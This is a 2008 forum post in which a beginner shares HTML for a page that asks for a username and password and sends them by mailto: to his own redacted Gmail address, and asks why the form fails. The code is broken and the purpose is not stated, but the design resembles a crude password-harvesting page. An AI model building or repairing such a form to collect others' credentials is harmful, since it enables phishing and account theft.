View Single Post
  #7 (permalink)  
Old 02-05-2008, 02:29 PM
Rammer124 Rammer124 is offline
Newbie
 
Join Date: Feb 2008
Posts: 10
Rep Power: 0
Rammer124 is on a distinguished road
Default

Quote:
<html>
<head>
<title>*********</title>
</head>
<body>
<center><form name="myform"

action="mailto:*******@gmail.com">
Username: <input type='text' name='username'><br>
Password: <input type='password' name='password'><br>
<A href="javascript: submitform()">Submit</A>
</form>
<SCRIPT language="JavaScript">
function submitform()

<br><br><br>
<marquee behavior="scroll" direction="left">Pressing "Submit" will

submit the form to me using e-mail. Thank you!</marquee>

</SCRIPT>
</body>
</html>
Ok, I am beginning to understand this. Is there something wrong the the action tag? I want the form results sent to me through email. Thanks!
Reply With Quote